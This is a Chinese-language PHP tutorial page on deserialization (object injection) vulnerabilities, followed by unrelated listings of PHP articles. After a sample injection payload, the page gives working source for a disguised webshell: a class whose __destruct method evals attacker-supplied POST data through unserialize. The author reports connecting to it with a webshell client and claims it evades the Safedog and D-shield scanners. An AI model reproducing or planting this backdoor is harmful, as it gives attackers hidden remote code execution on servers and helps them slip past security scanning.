PHP反序列化漏洞詳解-php教程-PHP中文網

首頁

後端開發

php教程

PHP反序列化漏洞詳解

小云云

Mar 22, 2018 pm 02:21 PM

php序列化漏洞

最近和小夥伴們一起研究了下PHP反序列化漏洞，突發奇想，利用反序列化漏洞寫一個一句話木馬效果應該蠻不錯的。本文主要和大家分享PHP反序列化漏洞詳解，希望能幫助大家。

0x01 PHP反序

說起PHP反序列化，那必須先簡單說一下PHP的序列化。 PHP序列化是將一個物件、陣列、字串等轉換為位元組流便於傳輸，例如跨腳本等。而PHP反序列化是將序列化之後的位元組流還原成物件、字元、陣列等。但是PHP序列化是不會保存物件的方法。

<?php
class A{
    var $test = "demo";
}
$a = new A();  // 生成a对象
$b = serialize($a);  // 序列化a对象为b
$c = unserialize($b); // 反序列化b对象为c
print_r($b);   // 输出序列化之后的值:O:1:"A":1:{s:4:"test";s:4:"demo";}
echo "\n";
print_r($c->test);  // 输出对象c中test的值:demo
?>

0x02 PHP反序列化漏洞

PHP類別中有一種特殊函數體的存在叫魔法函數，magic函數命名是以符號__開頭的，例如__construct, __destruct, __toString, __sleep, __wakeup等等。這些函數在某些情況下會自動調用，例如__construct當一個物件創建時被調用，__destruct當一個物件銷毀時被調用，__toString當一個物件被當作一個字串使用。
而在反序列化時，如果反序列化物件中存在魔法函數，使用unserialize()函數同時也會觸發。這樣，一旦我們能夠控制unserialize()入口，那麼就可能引發物件注入漏洞。

<?php
class A{
    var $test = "demo";
    function __destruct(){
            echo $this->test;
    }
}
$a = $_GET[&#39;test&#39;];
$a_unser = unserialize($a);
?>

例如上述程式碼，建構payload為http://127.0.0.1:800/test.php?test=O:1:"A":1:{s:4:"test";s :5:"hello";}
反序列化後在腳本運行結束時就會呼叫_destruct函數，同時會覆寫test變數輸出hello。

PHP反序列化漏洞詳解

0x03 回馬槍

我們可以利用這個漏洞點，控制輸入變量，拼接成一個序列化物件。然後再建構一個魔法函數，例如在_destruct()函數中呼叫eval執行序列化物件中的語句。

<?php
class A{
    var $test = "demo";
    function __destruct(){
        @eval($this->test);
    }
}
$test = $_POST[&#39;test&#39;];
$len = strlen($test)+1;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}"; // 构造序列化对象
$test_unser = unserialize($pp); // 反序列化同时触发_destruct函数
?>

PHP反序列化漏洞詳解

0x04 效果示範

直接菜刀連結：
PHP反序列化漏洞詳解

PHP反序列化漏洞詳解

##安全狗：

此木馬畢竟是跟正常檔案太像，所以免殺效果很不錯。這裡只是測試了安全狗、D盾，其餘自測。

小結######而且由此可以引發很多變形，這裡只是利用反序列化漏洞，其他漏洞也可以用來當作木馬的載體，畢竟cms的程式碼執行漏洞在被發現之前，他依舊是一個正常到不能再正常的文件。 ######相關推薦：#########php關於反序列化物件注入漏洞#############PHP序列化與反序列化原理詳解### ######### 深入了解php中序列化與反序列化#######

以上是PHP反序列化漏洞詳解的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

繼續使用PHP：耐力的原因Apr 19, 2025 am 12:23 AM

PHP仍然流行的原因是其易用性、靈活性和強大的生態系統。 1)易用性和簡單語法使其成為初學者的首選。 2)與web開發緊密結合，處理HTTP請求和數據庫交互出色。 3)龐大的生態系統提供了豐富的工具和庫。 4)活躍的社區和開源性質使其適應新需求和技術趨勢。

PHP和Python：探索他們的相似性和差異Apr 19, 2025 am 12:21 AM

PHP和Python都是高層次的編程語言，廣泛應用於Web開發、數據處理和自動化任務。 1.PHP常用於構建動態網站和內容管理系統，而Python常用於構建Web框架和數據科學。 2.PHP使用echo輸出內容，Python使用print。 3.兩者都支持面向對象編程，但語法和關鍵字不同。 4.PHP支持弱類型轉換，Python則更嚴格。 5.PHP性能優化包括使用OPcache和異步編程，Python則使用cProfile和異步編程。

PHP和Python：解釋了不同的範例Apr 18, 2025 am 12:26 AM

PHP主要是過程式編程，但也支持面向對象編程（OOP）；Python支持多種範式，包括OOP、函數式和過程式編程。 PHP適合web開發，Python適用於多種應用，如數據分析和機器學習。

PHP和Python：深入了解他們的歷史Apr 18, 2025 am 12:25 AM

PHP起源於1994年，由RasmusLerdorf開發，最初用於跟踪網站訪問者，逐漸演變為服務器端腳本語言，廣泛應用於網頁開發。 Python由GuidovanRossum於1980年代末開發，1991年首次發布，強調代碼可讀性和簡潔性，適用於科學計算、數據分析等領域。

在PHP和Python之間進行選擇：指南Apr 18, 2025 am 12:24 AM

PHP適合網頁開發和快速原型開發，Python適用於數據科學和機器學習。 1.PHP用於動態網頁開發，語法簡單，適合快速開發。 2.Python語法簡潔，適用於多領域，庫生態系統強大。

PHP和框架：現代化語言Apr 18, 2025 am 12:14 AM

PHP在現代化進程中仍然重要，因為它支持大量網站和應用，並通過框架適應開發需求。 1.PHP7提升了性能並引入了新功能。 2.現代框架如Laravel、Symfony和CodeIgniter簡化開發，提高代碼質量。 3.性能優化和最佳實踐進一步提升應用效率。

PHP的影響：網絡開發及以後Apr 18, 2025 am 12:10 AM

PHPhassignificantlyimpactedwebdevelopmentandextendsbeyondit.1)ItpowersmajorplatformslikeWordPressandexcelsindatabaseinteractions.2)PHP'sadaptabilityallowsittoscaleforlargeapplicationsusingframeworkslikeLaravel.3)Beyondweb,PHPisusedincommand-linescrip

PHP類型提示如何起作用，包括標量類型，返回類型，聯合類型和無效類型？Apr 17, 2025 am 12:25 AM

PHP類型提示提升代碼質量和可讀性。 1)標量類型提示：自PHP7.0起，允許在函數參數中指定基本數據類型，如int、float等。 2)返回類型提示：確保函數返回值類型的一致性。 3)聯合類型提示：自PHP8.0起，允許在函數參數或返回值中指定多個類型。 4)可空類型提示：允許包含null值，處理可能返回空值的函數。

See all articles